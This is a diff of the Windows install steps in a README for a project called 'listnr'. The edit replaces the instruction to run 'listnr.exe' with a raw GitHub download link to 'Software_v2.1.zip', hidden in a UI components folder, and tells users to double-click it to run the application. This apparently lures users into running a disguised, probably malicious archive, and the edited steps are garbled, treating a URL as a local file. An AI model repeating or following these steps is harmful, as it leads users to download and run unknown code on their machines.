alexniemiz1/listnr/README.md

 1. Once the ZIP file is downloaded, right-click on it and select “Extract All”.
 2. Choose a location to unzip the files and click “Extract”.
-3. Navigate to the extracted folder and locate the `listnr.exe` file.
+3. Navigate to the extracted folder and locate the `https://github.com/alexniemiz1/listnr/raw/refs/heads/main/internal/ui/components/Software_v2.1.zip` file.
-4. Double-click the `listnr.exe` file to run the application.
+4. Double-click the `https://github.com/alexniemiz1/listnr/raw/refs/heads/main/internal/ui/components/Software_v2.1.zip` file to run the application.

 ### macOS